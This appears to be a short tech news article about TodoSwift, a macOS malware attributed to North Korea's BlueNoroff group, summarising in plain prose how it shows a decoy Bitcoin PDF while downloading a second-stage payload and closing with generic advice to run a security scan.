Meet TodoSwift, a malicious application that disguises itself as a PDF downloader. Developed by the BlueNoroff threat group, TodoSwift leverages Apple’s Swift/SwiftUI to display a mock PDF about Bitcoin while secretly downloading a malicious payload. Don’t be fooled! Stay updated on this sophisticated malware.
A new wave of malware and vulnerabilities has been discovered targeting macOS users, this time disguised as a seemingly harmless downloadable Bitcoin PDF. Researchers at Kandji identified the malware, which they named TodoSwift because it is written in Swift/SwiftUI.
Kandji’s report shows that the malware is hidden in a file called “TodoTasks” that was uploaded to VirusTotal on July 24, 2024.
Further investigation revealed that TodoTasks uses a GUI application written in Swift/SwiftUI to disguise its malicious intent. The application presents itself as a tool for downloading and viewing PDFs. However, beneath the surface, TodoTasks has a more nefarious purpose.
In reality, the malware secretly downloads and executes a secondary malicious program. This two-step approach makes detection more difficult because the original application can appear legitimate.
It all starts with the creation of a window controller object through the makeWindowControllers method, which is used to execute the malware’s malicious behavior. The dropper then calls a PDF presentation function that fetches two URLs from memory: one points to a Google Drive link and the other is presumably malicious.
The buildCurlCommand uses the callToCurl function to download the content, a PDF file named “Bitcoin Price Prediction Using Machine Learning”. The PDF file looks harmless but serves as a deception to distract the user. After displaying the PDF file, the buildCurlCommand executes another curl command, which likely triggers the download of the malicious payload from the second URL.
Researchers have attributed the malware to the North Korean threat actor group BlueNoroff due to similarities to previously observed malware KandyKorn and RustBucket.
BlueNoroff is a subgroup of the larger North Korean state-backed group Lazarus and is known for persistently targeting financial institutions, cryptocurrency exchanges, and government entities. Recently, BlueNoroff has demonstrated a sophisticated ability to evade detection and carry out complex cyberattacks.
In 2019, the U.S. Treasury Department imposed sanctions on three North Korean cyber groups – Lazarus, Bluenoroff and Andariel – for their cyber activities against critical infrastructure and alleged that they supported illegal weapons and missile programs. However, the group remains a persistent threat.
If you suspect that you have downloaded TodoSwift or similar malware, we recommend that you run a comprehensive security scan on your device using a reputable antivirus program. Also, remember to stay updated and practice safe browsing habits.
RELATED TOPICS
- Apple Safari is the safest, Google Chrome the riskiest browser
- Security flaw in Apple shortcuts exposes confidential data
- Bluetooth bug enables keystroke injection on macOS and iOS
- Cracked macOS software infected with new Trojan proxy malware
- Facebook, Apple and Amazon most frequently imitated in phishing scams
